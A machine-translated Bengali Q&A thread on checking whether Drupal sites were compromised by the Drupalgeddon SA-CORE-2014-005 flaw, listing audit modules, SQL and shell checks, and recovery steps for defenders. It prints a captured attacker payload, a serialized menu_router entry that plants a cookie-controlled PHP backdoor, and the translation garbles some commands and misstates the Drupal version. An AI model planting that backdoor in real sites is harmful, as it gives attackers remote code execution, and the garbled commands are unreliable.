ড্রুপাল SA-CORE-2014-005 - আমার সার্ভার / সাইটগুলি আপোস করা হয়েছে কিনা তা কীভাবে বলবেন?

ড্রুপাল এসএ-কোরি -2014-005 শোষণের সমাধানের প্যাচ পদ্ধতিটি ব্যবহার করে আমি আমার সমস্ত সাইটকে আপডেট করেছি। আমি কেবল প্রতিবেদনগুলি পড়েছিলাম যে গতকাল রাশিয়ান আইপি থেকে অনুপ্রবেশকারী ড্রুপাল সাইট থেকে কেউ আছেন।

https://www.drupal.org/SA-CORE-2014-005

আমার প্রধান উদ্বেগ এখন:

• আমার সাইটগুলি সমন্বিত হয়েছে কিনা আমি কীভাবে বলব?
• আমার সাইটটি ভুক্তভোগী ছিল কিনা তা সনাক্ত করতে আমার অ্যাপাচি অ্যাক্সেস লগগুলিতে আমি কী সন্ধান করব?
• এখনও অবধি এই হ্যাকারগুলি সমন্বিত সাইটগুলিতে কী করছে?

এখানে কিছু এসকিউএল কোয়েরি রয়েছে যেগুলি প্রশাসকের সুবিধাসমূহ সহ ব্যবহারকারীদের অনুসন্ধানের জন্য আপনার সাইটের ডিবি'র বিরুদ্ধে চালানো যেতে পারে এবং 15 অক্টোবর সাইট পোস্টে এর মধ্যে কোনটি অ্যাক্সেস করেছে?

http://www.drupalden.co.uk/sql-queries-find-users-roles-admin-privileges-drupalgeddon-drupal-sa-core-2014-005

আপনি যদি এই নিবন্ধটি পড়ছেন এবং শোষণের অবতরণের এক মাসেরও বেশি সময় ধরে একটি ড্রুপাল 7 সাইট পরীক্ষা করার প্রত্যাশা করছেন, আপনার সাইটটি সম্ভবত ইতিমধ্যে হ্যাক হয়ে গেছে । আপনার সেরা বাজি হ'ল আক্রমণ শুরু হওয়ার আগে থেকেই একটি ব্যাকআপ পুনরুদ্ধার করা এবং সেখান থেকে কাজ করা।

SA-CORE-2014-005 এ একটি FAQ রয়েছে ।

আমার সাইটগুলি আপোস করা হয়েছে কিনা তা আমি কীভাবে বলব?

সাইটগুলি আপোস করা হয়েছে কিনা তা দ্রুত পরীক্ষা করার একটি উপায় হ'ল ড্রুপালজেডন ড্রাশ কমান্ডের সাথে।

• https://www.drupal.org/project/drupalgeddon

আপনার ~/.drushসাথে ইনস্টল করুনdrush dl drupalgeddon

তারপরে drush drupalgeddon-testপরীক্ষার জন্য ব্যবহার করুন। ড্রিশ এলিয়াসগুলি এটিকে সহজ এবং দ্রুত করে তোলে।

এই সরঞ্জামটি কোনও শোষিত সাইটের নিশ্চিত করতে পারে, তবে এটি আপনার সাইটটি শোষণ না হওয়ার গ্যারান্টি দিতে পারে না। আক্রমণ শুরুর আগে আপগ্রেড না করা হলে এখানে কোনও "ক্লিন বিল অফ হেলথ" নেই।

সাইট অডিট মডিউলটিতে দ্রুপালগেডন থেকে কিছু চেক অন্তর্ভুক্ত রয়েছে এবং আপনাকে আরও অনেক দরকারী ইনপুট দেয়। আমি এটি উচ্চ প্রস্তাব। (সম্পাদনা: এখন তারা একসাথে কাজ - খুব সুন্দর!)

• http://drupal.org/project/site_audit

সুরক্ষা পর্যালোচনা ড্রুপালজেডন আক্রমণগুলির জন্য যাচাই করে না তবে এটি আপনার সরঞ্জামদণ্ডেও মূল্যবান।

• http://drupal.org/project/security_review

যদি আপনার সাইটের কোডবেস www ব্যবহারকারীর কাছে লিখিত হয় তবে আপনি অতিরিক্তভাবে হ্যাক হওয়া মডিউলটি ব্যবহার করে সংশোধিত কোড পরীক্ষা করতে পারেন। এই মডিউলটি কেবল তার নামের উপর ভিত্তি করে যা মনে করেন তা করতে পারে না :)

• http://drupal.org/project/hacked

সমস্ত আপোসযুক্ত সাইটগুলি সনাক্ত করার কোনও নির্দিষ্ট উপায় নেই তবে এই সরঞ্জামগুলি আপনাকে সর্বাধিক সাধারণ সূচকগুলি সনাক্ত করতে সহায়তা করতে পারে।

আমার সাইটটি ভুক্তভোগী ছিল কিনা তা সনাক্ত করতে আমার অ্যাপাচি অ্যাক্সেস লগগুলিতে আমি কী সন্ধান করব?

আপনার অ্যাক্সেস লগগুলিতে এখনই প্রচুর পোস্ট অনুরোধ থাকবে। আপনি যদি বাগের আগে থেকে সমস্ত পোস্ট ডেটা লগ করার অস্বাভাবিক পদক্ষেপ না নিয়ে থাকেন তবে এগুলির মধ্যে কোনটি দূষিত ছিল তা জানার আপনার কাছে সম্ভাবনা নেই।

এতক্ষণ এই হ্যাকাররা আপোসযুক্ত সাইটগুলিতে কী করছে?

অনেকে রিপোর্ট করছে যে তাদের সাইটগুলি হ্যাকাররা প্যাচ করছে! আক্রমণকারী হিসাবে, এটি ভালভাবে বোঝায় - আপনি চান না যে আপনার নতুন ছিনতাই করা সাইটটি পরবর্তী আক্রমণকারী দ্বারা আপনার নীচে থেকে চাবুকের আছড়ে পড়ে :)

তা ছাড়া, আমি অনুমান করতে পারি যে সাইটগুলি যে কোনও মূল্যবান ডেটা সংগ্রহ করার জন্য ব্যবহার করা হচ্ছে (সম্ভবত কিছু শংসাপত্র অর্জন করতে পারে, শোষণের পরে লেনদেনের বিশদ উত্তোলন করতে হবে) এবং স্প্যাম প্রেরণ এবং নম্র বোটনেট ক্রীতদাস হিসাবে কাজ করার মতো বিরক্তিকর কাজগুলি করার জন্য। ওহ, এবং হাইজ্যাক করা ড্রুপাল সাইটগুলির আক্রমণকারীর সাম্রাজ্যকে আরও প্রসারিত করুন। (দুঃখিত, আমার কাছে পর্যবেক্ষণের জন্য কোনও হ্যাক সাইট নেই))

সাধারণ আক্রমণগুলির জন্য কিছু চেক হ'ল (এটি একটি বিস্তৃত তালিকা নয়, তবে এখনও পর্যন্ত বুনোতে দেখা কিছু আক্রমণ):

• আপনার ব্যবহারকারীর নাম, ইমেল ঠিকানা বা পাসওয়ার্ড আপনি কী আশা করছেন তা নিশ্চিত করার জন্য আপনার ব্যবহারকারীর 1 অ্যাকাউন্টটি পরীক্ষা করুন। সম্ভব হলে উচ্চতর স্তরের অনুমতি প্রাপ্ত যে কোনও ব্যবহারকারীর অ্যাকাউন্টও পরীক্ষা করে দেখুন।
• সন্দেহজনক দেখতে লাগছে এমন নতুন ব্যবহারকারীর অ্যাকাউন্টগুলির জন্য পরীক্ষা করুন।
• আপনার সিস্টেমে ভূমিকার জন্য পরিবর্তনগুলি পরীক্ষা করুন, উদাহরণস্বরূপ কোনও নতুন ভূমিকা বা নাম পরিবর্তিত ভূমিকাগুলি।
• অনুমতি পরিবর্তনের জন্য পরীক্ষা করুন। এর সর্বাধিক গুরুত্বপূর্ণ দিকটি নিশ্চিত করা হয় যে বেনামে ব্যবহারকারীর ভূমিকা (বা যে কোনও ভূমিকা নিতে যে কেউ নিজেরাই সাইন আপ করতে পারে) তাদের বর্ধিত অ্যাক্সেস দেওয়ার জন্য পরিবর্তন করা হয়নি।
• নতুন কাস্টম ব্লকগুলির জন্য পরীক্ষা করুন যাতে দূষিত কোড থাকতে পারে।
• নতুন কাস্টম নোডের জন্য পরীক্ষা করুন যাতে দূষিত কোড থাকতে পারে।
• আপনার ফাইল সিস্টেমে ফাইলগুলি পরীক্ষা করুন যা সেখানে না থাকা উচিত। আপনি যদি সংস্করণ নিয়ন্ত্রণ ব্যবহার করেন তবে এটি সহজ কারণ আপনি কোনও নতুন ফাইল আছে কিনা তা দেখতে গিট স্ট্যাটাস বা এসএনএন স্টেট করতে পারেন।
• যদি তারা দূষিত ফাইলগুলি আপলোড করে থাকে তবে আপনি অপরিচিত না এমন অদ্ভুত ফাইলের নামগুলির জন্য আপনার অ্যাক্সেস লগগুলি পরীক্ষা করতে পারেন।

• দূষিত এন্ট্রিগুলির জন্য আপনার মেনু রাউটার ডাটাবেস টেবিলটি পরীক্ষা করুন। উদাহরণস্বরূপ (drupalgeddon মডিউল / ড্রপ প্লাগিনে drupal.org এ এই টেবিলটি আরও ভাল করে পরীক্ষা করার জন্য একটি ভাল স্ক্রিপ্ট রয়েছে):

  মেনু_রোউটার থেকে * নির্বাচন করুন যেখানে অ্যাক্সেস_ক্যালব্যাক = 'ফাইল_পুট_কন্টেন্টস';

• আপনি অদ্ভুত সন্ধানকারী এন্ট্রিগুলির জন্য আপনার মেনু রাউটার টেবিলটি ব্রাউজ করতে পারেন।

হ্যাকাররা কিছু কাজ করার চেষ্টা করছে:

• আপনার সাইটে পিএইচপি স্ক্রিপ্ট ফাইলগুলি রাখুন যা সেগুলি ব্রাউজারে আঘাত করে চালাতে পারে। এই স্ক্রিপ্টগুলি বিবিধ দূষিত কাজ করতে পারে। দূষিত মেনু রাউটার এন্ট্রি যুক্ত করার মাধ্যমে এটি অর্জন করা হয়।
• আপনার সাইটের খারাপ কাজ করতে বা আপনার সাইটটি দখল করতে ব্যবহার করার জন্য তাদের প্রশাসক অ্যাকাউন্টগুলি তৈরি করুন।
• ব্যবহারকারীর 1 ইমেল ঠিকানা পরিবর্তন করুন যাতে তারা সেই অ্যাকাউন্টের জন্য পাসওয়ার্ড পুনরায় সেট করতে এবং এটি গ্রহণ করতে পারে।
• সর্বজনীনভাবে অ্যাক্সেসযোগ্য ব্যবহারকারীর ভূমিকাতে অনুমতি পরিবর্তন করুন।
• ব্লক / নোড / ইত্যাদি যুক্ত করুন। এতে দূষিত কোড থাকতে পারে। আপনি যদি পিএইচপি ফিল্টার সক্ষম করে থাকেন তবে এটি আরও বেশি সমস্যা।

দুর্ভাগ্যক্রমে আক্রমণকারী আপনার ডাটাবেসে এমন অনেক কিছু করতে পারে যে সম্ভাবনার সম্পূর্ণ তালিকা দেওয়া বেশ শক্ত। তারা এমন কিছু করতে পারে যা তাদের আপনার সাইটের নিয়ন্ত্রণ পেতে চেষ্টা করে অথবা তারা কেবল আপনার সাইটটি ভেঙে ফেলতে পারে তবে ডাটাবেস টেবিল বা কলামগুলি বাদ দেয় etc.

তারা এমনকি সাইটের কনফিগারেশনে খুব সামান্য পরিবর্তন করতে পারে যেমন আপনার সাইটের নাম বা এর মতো কিছু পরিবর্তন করতে পারে যা বিশ্বের শেষ নয় তবে এখনও সমস্যাযুক্ত।

মূলত, এসকিউএল কমান্ড চালিয়ে আপনি আপনার ডাটাবেসে যা কিছু করতে পারেন, আক্রমণকারী তাত্ত্বিকভাবে করতে পারে।

ক্রিস বার্গেসের উত্তরে উল্লিখিত সমস্ত মডিউল এই বিষয়গুলি পরীক্ষা করতে খুব দরকারী।

আমি মনে করি আমি drupal.org পরামর্শ নিয়ে যাব " আপনার অনুমানের অধীনে এগিয়ে যাওয়া উচিত যে প্রতিটি দ্রুপাল 11 ওয়েবসাইট 15 ই অক্টোবর, রাত 11 টা ইউটিসির আগে আপডেট না করা বা প্যাচ করা না হলে আপোস করা হয়েছিল, এটি ঘোষণার 7 ঘন্টা পরে ।" বেভান যেমন এই মন্তব্যে বলেছিলেন "দ্রুপাল আপডেট করা বা প্যাচিং করা দ্রুপাল আপডেট করার বা প্যাচ করার আগে আক্রমণকারীরা যে বাড়ির পিছনে ইনস্টল করেছিল তা ঠিক করে না।"

বেভান নিম্নলিখিত প্রণীত সাহায্য করার জন্য আপনি বিশ্লেষণ যদি আপনি সংক্রমিত হয়ে থাকতে পারে এবং পুনরুদ্ধার এবং প্রতিরোধ কিভাবে কর্মপ্রবাহ চার্ট । তবে, আপনার কর্মপ্রবাহের সর্বশেষতম সংস্করণ রয়েছে তা নিশ্চিত করতে তিনি প্রত্যেককে তার মূল নিবন্ধে যেতে বলে ask এছাড়াও, অ্যাকুয়া আকুয়া ক্লাউডে তারা যে আক্রমণগুলি এবং নিদর্শনগুলি নিয়েছে সে সম্পর্কে একটি আকর্ষণীয় নিবন্ধ তৈরি করে

থেকে উদ্ধৃতি: https://www.drupal.org/node/2357241#comment-9258955

এটি ফাইলের একটি উদাহরণ যা মেনু_আউটার টেবিল অ্যাক্সেস_ক্যালব্যাক কলামে sertedোকানো হয়:

a:2:{i:0;s:22:"modules/image/vzoh.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";}

আপনি দেখতে পাচ্ছেন এটি ফাইল মডিউল / চিত্র / vzoh.php তৈরি করার চেষ্টা করছে তবে যেহেতু আমি কেবলমাত্র সেই ডিরেক্টরিগুলির মধ্যেই কেবল পড়ার অনুমতি পেয়েছি পিএইচপি ব্যর্থ হয়।

আপনার ড্রুপাল ডিরেক্টরিতে অনুসন্ধান করে তৈরি করা অনুরূপ ফাইলগুলি পাওয়া লোকদের প্রতিবেদন: https://www.drupal.org/node/2357241#comment-9260017

আমি যা করেছি তা হ'ল নিম্নলিখিত কমান্ডটি করা:

ack --type = php 'php \ $ form'> hacked_searched_php_form1.txt

==================

থেকে উদ্ধৃত: http://www.paulbooker.co.uk/drupal-developer/command-lines/5-commands-help-drupalgeddon

লাইভ সার্ভারে পরিবর্তন হওয়া ফাইলগুলি দেখানো হচ্ছে: গিট স্ট্যাটাস

মেনু_আউটারের মাধ্যমে কোড কার্যকরকরণের প্রচেষ্টা সন্ধান করছে: মেনু_আউটার থেকে * নির্বাচন করুন যেখানে অ্যাক্সেস_ক্যালব্যাক = 'ফাইল_পুট_কন্টেন্টস'

লাইভ সার্ভারে কোন ফাইলগুলি রয়েছে এবং সংস্করণ নিয়ন্ত্রণে নেই সেগুলি দেখানো হচ্ছে: ডিফ-আর ডক্রুট রেপো গ্রেপ ডক্রোট | গ্রেপ 'কেবলমাত্র ডোক্রোটে'

ফাইল ডিরেক্টরিতে পিএইচপি ফাইলগুলি সন্ধান করা: সন্ধান করুন। -পথ "* পিএইচপি"

কোনও ব্যবহারকারী যখন আপনার সাইটে লগইন করেছেন এবং তাদের অতি সাম্প্রতিক পৃষ্ঠাটি দেখার সময়টির পরিমাণ পরীক্ষা করছেন: সেশনগুলির অভ্যন্তরীণ ব্যবহারকারীদের থেকে u.uid নির্বাচন করুন s.uid = u.uid;

আপনার প্রশংসা করা হয়েছে কিনা তা জানাতে কমান্ডগুলির একটি খুব ভাল তালিকা।

http://www.paulbooker.co.uk/drupal-developer/command-lines/5-commands-help-drupalgeddon

Commands that help with auditing:

Showing files that have changed on the live server:

?
1
git status 
Looking for code execution attempts via menu_router:

?
1
select * from menu_router where access_callback = 'file_put_contents'
Another possible code execution attempt via menu_router:

?
1
select * from menu_router where access_callback = 'assert';
Showing which files are on the live server and not in version control:

?
1
diff -r docroot repo | grep 'Only in docroot'
Looking for PHP files in the files directory:

?
1
find . -path "*php"
Looking for additional roles and users:

?
1
2
select * from role
select * from users_roles where rid=123
Checking the amount of time between when a user logged into your site and their most recent page visit:

?
1
select (s.timestamp - u.login) / 60 / 60 / 24 AS days_since_login, u.uid from sessions s inner join users u on s.uid = u.uid;


Commands that can help with recovery:

Apply the patch. Hotfix: (SA-CORE-2014-005)

?
1
curl https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch | patch -p1
End active sessions, i.e log everyone out.

?
1
truncate table sessions;
Updating passwords:

?
1
update users set pass = concat('XYZ', sha(concat(pass, md5(rand()))));

আপনার ওয়েবসাইটটি এই অনলাইন সরঞ্জাম দিয়ে হ্যাক হয়েছে কিনা তা আপনি পরীক্ষা করতে পারেন:

ড্রুপাল চেক: ইঞ্জিনহ্যাক

স্পষ্টতই এটির সীমাবদ্ধতা রয়েছে তবে এটি একটি ভাল সূচনার পয়েন্ট।